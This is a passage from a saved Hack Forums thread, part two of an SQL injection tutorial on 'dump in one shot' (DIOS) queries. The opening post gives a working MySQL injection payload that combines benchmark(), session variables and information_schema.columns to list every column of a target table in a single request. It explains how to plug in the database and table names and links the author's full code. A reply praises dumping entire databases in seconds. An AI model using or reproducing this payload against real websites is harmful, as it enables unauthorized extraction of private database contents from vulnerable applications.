dir="ltr"><code><span style="color: #66CCFF">concat</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">clm</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,@</span><span style="color: #66CCFF">clm_out</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x3c62723e</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">benchmark</span><span style="color: #7AC07C">((</span><span style="color: #66CCFF">select&nbsp;count</span><span style="color: #7AC07C">(*)&nbsp;</span><span style="color: #66CCFF">from&nbsp;information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">columns&nbsp;<br>where&nbsp;table_schema</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">some_database_name&nbsp;</span><span style="color: #7AC07C">and&nbsp;</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">some_table_name</span><span style="color: #7AC07C">),<br>@</span><span style="color: #66CCFF">clm_out</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">CONCAT</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">clm_out</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x3c62723e</span><span style="color: #7AC07C">,(</span><span style="color: #66CCFF">Select&nbsp;</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">clm</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">column_name</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">from&nbsp;information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">columns&nbsp;<br>where&nbsp;table_schema</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">some_database_name&nbsp;</span><span style="color: #7AC07C">and&nbsp;</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">some_table_name&nbsp;<br></span><span style="color: #7AC07C">and&nbsp;</span><span style="color: #66CCFF">column_name</span><span style="color: #7AC07C">&gt;@</span><span style="color: #66CCFF">clm&nbsp;order&nbsp;by&nbsp;column_name&nbsp;LIMIT&nbsp;1</span><span style="color: #7AC07C">))),@</span><span style="color: #66CCFF">clm_out</span><span style="color: #7AC07C">)&nbsp;<br></span></code></div></div></div><br>Again, we will replace <span style="color: #FF1493;">some_database_name</span> with actual database stored in every iteration in variable <span style="color: #FF1493;">@sch</span> and <span style="color: #FF1493;">some_table_name</span> with actual table name stored in every iteration in variable <span style="color: #FF1493;">@tbl</span>.<br><br>See my final code to that challenge <a href="http://pastie.org/private/ivdoyawlmqivwvnjpzeyw" target="_blank"><span style="text-decoration: underline;">here</span></a>.<br><br>And result was:<br><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/bd07d55118ffebd2ee26376dd7d02657.jpg" alt="[Image: bd07d55118ffebd2ee26376dd7d02657.jpg]" border="0"><br><br>Quite impressive output with 5823 lines of data for few lines of code <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"><br><br>In next part of this tutorial I will show you combining <a href="http://www.hackforums.net/showthread.php?tid=3487536" target="_blank"><span style="text-decoration: underline;">regular DIOS</span></a> with benchmark. Stay tuned.<br><br>Thanks for reading <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"><br><br>P.S.<br>In
 some cases for total dump in all three levels (all databases/all tables
 in each database/all columns in each table) we can use strategy <span style="color: #FFD700;">without nested DIOS</span> explained in my SQLi tutorial <a href="http://www.hackforums.net/showthread.php?tid=4040708" target="_blank"><span style="text-decoration: underline;">Playing with "dump in one shot" syntax - part #4</span></a>. Be aware that strategy won't work 100% correctly if some database has <span style="color: #32CD32;">0 tables</span>
 because in that case database info for such database won't be stored in
 information_schema.columns table. We had such case in challenge <a href="http://www.hackforums.net/showthread.php?tid=4023034" target="_blank"><span style="text-decoration: underline;">#88</span></a>.</div><div class="post_meta" id="post_meta_39141608"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=4137953&amp;replyto=39141608" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid39143048" id="pid39143048"></a><table class="tborder" style="margin-top: 5px; " id="post_39143048" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">Today, 02:08 PM <span id="edited_by_39143048"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=4137953&amp;pid=39143048#pid39143048">#2</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1846278"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/avatar_1846278.jpg" alt="" height="48" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1846278"><span class="group9">t.pro</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">0x742e50524f203b2d29<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/starl33t.png" alt="*" border="0"><br></span><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/hf_l33t.png" alt="HF l33t" title="HF l33t"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 19<br>Posts: 363<br>Joined: Jun 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1846278"><strong class="reputation_positive">42</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_39143048">That's amazing. after a few month of trying this is finally the solution to transfer VARS from one DIOS to another <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"><br><br>great explanation! complete DB's dump with a few lines in seconds <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/hehe.gif" style="vertical-align: middle;" alt="Hehe" title="Hehe" border="0"><br><br>and yes we stay tuned <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/cool.gif" style="vertical-align: middle;" alt="Cool" title="Cool" border="0"><br><br>thx for sharing!</div><div class="post_meta" id="post_meta_39143048"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="https://www.facebook.com/tech.prospect" target="_blank" class="bitButton" rel="nofollow" title="Visit this user's website">WWW</a> <a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1846278" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=4137953&amp;replyto=39143048" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table></div><table class="tborder" style="border-top-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td colspan="2" class="tfoot"><div><strong>« <a href="http://www.hackforums.net/showthread.php?tid=4137953&amp;action=nextoldest" rel="nofollow">Next Oldest</a> | <a href="http://www.hackforums.net/showthread.php?tid=4137953&amp;action=nextnewest">Next Newest</a> »</strong></div></td></tr></tbody></table><div class="float_left"></div><div style="padding-top: 4px;" class="float_right"><a href="http://www.hackforums.net/newreply.php?tid=4137953" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><br style="clear: both;"><br><div class="float_left"><ul class="thread_tools"><li class="printable"><a href="http://www.hackforums.net/printthread.php?tid=4137953">View a Printable Version</a></li> <!-- // <li class="sendthread"><a href="sendthread.php?tid=4137953" rel="nofollow">Send this Thread to a Friend</a></li> --><li class="subscription_add"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=4137953&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">Subscribe to this thread</a></li></ul></div><div class="float_right" style="text-align: right;"></div><br style="clear: both;"></div><br><div class="bottommenu"><div><span class="smalltext"><a href="http://www.hackforums.net/contact.php">Contact Us</a> | <a href="http://www.hackforums.net/">Hack Forums</a> | <a href="http://www.hackforums.net/archive/index.php/thread-4137953.html">Lite (Archive) Mode</a> | <a href="http://www.hackforums.net/showstaff.php">Staff</a> | <a href="http://www.hackforums.net/myawards.php">Awards</a> | <a href="http://www.hackforums.net/misc.php?action=help&amp;hid=12">Legal Policies</a> | <a href="#top">Top</a></span></div></div><br></div><hr class="hidden"><div id="copyright"><div id="debug"></div><br class="clear"></div></div><br><script src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/urchin.js" type="text/javascript"></script> <script type="text/javascript">_uacct = "UA-249290-34";
urchinTracker();
</script> <script language="javascript"><!--
bmi_SafeAddOnload(bmi_load,"bmi_orig_img",0);//-->
</script></div></body></html>
<!--//-->